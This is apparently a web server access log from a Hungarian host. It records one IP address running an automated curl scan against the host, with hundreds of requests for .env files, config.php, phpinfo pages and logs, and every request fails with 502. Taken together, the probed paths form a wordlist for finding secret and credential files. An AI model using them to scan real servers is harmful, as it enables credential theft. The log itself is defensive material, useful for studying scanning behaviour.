[Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/i.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/icon/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/icons/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/ikiwiki/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/image_data/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/Imagebord/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:23 +0000] - - 502 - GET https terminal.profibot.hu "/images/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/img/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/in.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/inc.config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/includes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/includes/config.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/index.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/index.php~" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/index1.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/inf.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/info1.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/info2.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/info3.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/info4.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/infophp.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/infos.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/ini.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/install/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/InstantCV/server/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/internal-api/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/internal/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/internal/config" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/isadmin.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/items/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/javascript/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/jenkins/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/jo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/joomla/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/js-plugin/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/js/app.[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/js/app.bundle.min.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/js/chunk-79be581b.c4b0f5e4.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:24 +0000] - - 502 - GET https terminal.profibot.hu "/js/chunk-vendors.[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/js/chunks/[chunk-name].[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/js/contact_me.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/js/vendor.[hash].js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/jsrelay/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/jupyter/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/khanlinks/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/kibana/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/kodenames-server/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/kolab-syncroton/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/Kubernetes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/kubernetes/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/l.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/lab/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/lambda/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/latest/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/layout/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/lcomernbootcamp/projbackend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/leafer-app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/ledger_sync/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/legacy/tests/9.1.1" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/legacy/tests/9.2.0" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/legal/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/lemonldap-ng-doc/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/lemonldap-ng-fr-doc/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/letsencrypt/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/lib/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/lib/config.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/libraries/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/Library/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/libs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/lindex.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:25 +0000] - - 502 - GET https terminal.profibot.hu "/linusadmin-phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/linux/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/local.settings.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/localhost/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/locally/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/log.txt" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/log/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/log/development.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/logging/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/login/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/login/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/logs/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/logs/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/logs/access.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/logs/app.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/logs/error.log" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/magento/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/mailinabox/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/mailman/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main-es2015.3c3aa123423ff18c0b00.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main-es2018.96dcf91e05121e327dcb.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main-TDTOTK7F.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main-WTCAS2AO.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main.0ad61943313a734cc3ac.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main.2b8841d1a101dd041285.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main.35a08c25eb91de70487f.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main.457ddfd2b1341056.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main.48f1bbcf6201c5ea.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main.58a95e8d8659972f.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main.702787bb88cacd05b11d.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main.b610bd7c7b9b7a47.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main.js" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:26 +0000] - - 502 - GET https terminal.profibot.hu "/main.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/main.yml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/main_user/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/Makefile" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/manifest.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/manual/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/master/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/media/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/memcached/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/mentorg-lava-docker/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/micro-app-react-communication/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/micro-app-react/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/mindsweeper/gui/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/minified/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/misc/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/Modix/ClientApp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/monerod/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/mongodb/config/dev/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/monitoring/compose/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/moodledata/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/msks/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/munki_repo/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/music/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/MyRentals.Web/ClientApp/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/mysql/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/name/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/nest/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/netlify.toml" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/new-js/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/new.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/news-app/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/next/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/nginx-server/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:27 +0000] - - 502 - GET https terminal.profibot.hu "/niffler-frontend/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/node_modules/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/Nodejs-Projects/play-ground/login/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/Nodejs-Projects/play-ground/ManageUserRoles/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/noVNC/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/now.json" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/Nuke.App.Ui/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/nuxt/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/o.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/ocp.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/of.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/old/" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/old/.env" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to web-terminal] "curl/8.7.1" "-" +[28/Jan/2026:01:44:28 +0000] - - 502 - GET https terminal.profibot.hu "/old_phpinfo.php" [Client 185.177.72.13] [Length 154] [Gzip -] [Sent-to 